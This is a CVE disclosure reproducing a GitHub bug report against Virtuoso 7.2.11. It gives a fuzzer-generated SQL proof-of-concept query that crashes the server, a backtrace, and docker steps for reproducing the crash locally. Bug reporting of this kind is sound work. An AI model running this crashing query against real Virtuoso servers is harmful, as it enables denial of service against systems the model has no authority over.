Headline
CVE-2023-48952: Fuzzer: Virtuoso 7.2.11 crashed at box_deserialize_reusing · Issue #1175 · openlink/virtuoso-opensource
An issue in the box_deserialize_reusing function in openlink virtuoso-opensource v7.2.11 allows attackers to cause a Denial of Service (DoS) after running a SELECT statement.
The PoC is generated by my DBMS fuzzer.
CREATE TABLE v0 ( v1 INT , v2 BIGINT PRIMARY KEY) ; INSERT INTO v0 VALUES ( 20 , -1 ) ; SELECT v1 + 77 , v2 FROM v0 UNION SELECT v2 , CASE WHEN 92 THEN 86 ELSE ( ( 32433852.000000 , 70038895.000000 ) , ( 64572024.000000 , 4442219.000000 ) ) END FROM v0 ORDER BY v2 + -1 * 40 ;
backtrace:
#0 0x876418 (box_deserialize_reusing+0x38) #1 0x87917e (sslr_qst_get+0x46e) #2 0x81f2f6 (select_node_input_vec+0x656) #3 0x7ba667 (select_node_input+0xa7) #4 0x7af05e (qn_input+0x3ce) #5 0x7af78f (qn_ts_send_output+0x23f) #6 0x7b509e (table_source_input+0x16ee) #7 0x7af05e (qn_input+0x3ce) #8 0x7af4c6 (qn_send_output+0x236) #9 0x7af05e (qn_input+0x3ce) #10 0x7af4c6 (qn_send_output+0x236) #11 0x8214bd (set_ctr_vec_input+0x99d) #12 0x7af05e (qn_input+0x3ce) #13 0x7c084b (qr_exec+0x11db) #14 0x7ce1d6 (sf_sql_execute+0x11a6) #15 0x7cecde (sf_sql_execute_w+0x17e) #16 0x7d799d (sf_sql_execute_wrapper+0x3d) #17 0xe214bc (future_wrapper+0x3fc) #18 0xe28dbe (_thread_boot+0x11e) #19 0x7fca3837c609 (start_thread+0xd9) #20 0x7fca3814c133 (clone+0x43)
ways to reproduce (write poc to the file /tmp/test.sql first):
remove the old one
docker container rm virtdb_test -f
start virtuoso through docker
docker run --name virtdb_test -itd --env DBA_PASSWORD=dba openlink/virtuoso-opensource-7:7.2.11
wait the server starting
sleep 10
check whether the simple query works
echo “SELECT 1;” | docker exec -i virtdb_test isql 1111 dba
run the poc
cat /tmp/test.sql | docker exec -i virtdb_test isql 1111 dba